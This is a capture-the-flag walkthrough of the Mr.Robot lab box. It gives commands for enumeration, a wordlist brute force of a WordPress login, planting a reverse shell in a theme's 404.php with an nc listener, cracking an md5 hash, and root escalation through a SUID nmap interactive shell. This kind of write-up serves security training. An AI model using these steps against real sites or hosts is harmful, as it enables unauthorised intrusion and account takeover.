
- Information
- name: Mr.Robot
- OS: Linux
- Difficulty: Easy
- Description: This is my second time doing this box; it is very interesting and easy. I recommend it to everyone who has watched the Mr.Robot series.
Summary
- Enumerating port 80 with GoBuster.
- Brute forcing the WP login with Hydra.
- Reverse shell through 404.php.
- Cracking an md5 password.
- Logging in as robot and privilege escalation to root.
nmap
root@kali:~# nmap -sC -sV 10.10.145.82
Nmap scan report for 10.10.145.82
Host is up (0.17s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
First Key
* On port 80 we got a cool webpage but nothing useful.
* So I started enumeration.
gobuster dir -u http://10.10.116.11 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
* After some time we got a page called blog, so we found WP; let's go to /wp-admin.php.
* Let's do user enumeration
wpscan --url 10.10.116.11 --enumerate u
* After some time we got one user: Elliot
* When we look at /robots.txt we get something really useful
User-agent: *
fsocity.dic
key-1-of-3.txt
* We got the first key
Second Key
* When we look at /fsocity.dic, it's basically a wordlist
* Let's download the wordlist and try to use it on the WP login
wget http://10.10.116.11/fsocity.dic
* Before we brute force WP, let's sort the wordlist and drop duplicate entries (it gets much smaller)
sort fsocity.dic | uniq > fsocity-sorted.dic
* Now let's brute force the WP login
wpscan --url 10.10.116.11 --wp-content-dir wp-admin --usernames elliot --passwords ~/Downloads/fsocity-sorted.dic
* After 2 minutes I got the password
* Let's log in
* The theme is Twenty Fifteen, so let's get a reverse shell
* Go to Appearance > Editor and choose 404.php
* I will use the PentestMonkey reverse shell, so I recommend using that one
* Make sure the listener is on (nc -lvnp port)
* Now go to the page http://10.10.116.11/wp-content/themes/twentyfifteen/404.php
* And boom, we have a shell as daemon
* Let's upgrade the shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
* After a while I found an md5 password in /home/robot/ that I can read
* Let's try to crack it and log in as robot
* You can use John to crack it, but I will use the CrackStation webpage, just copy and paste :)
* We can't ssh in, so let's just try su robot
* And we are in; now we can read key number 2
Privilege escalation to root (third key)
* Let's use find to look for SUID binaries we can use to escalate to root
find / -perm -u=s -type f 2>/dev/null
* And we can see nmap, so let's try to get root through its interactive mode
nmap --interactive
!sh
* And as you can see we are root, so we can take the third key
Amar#0484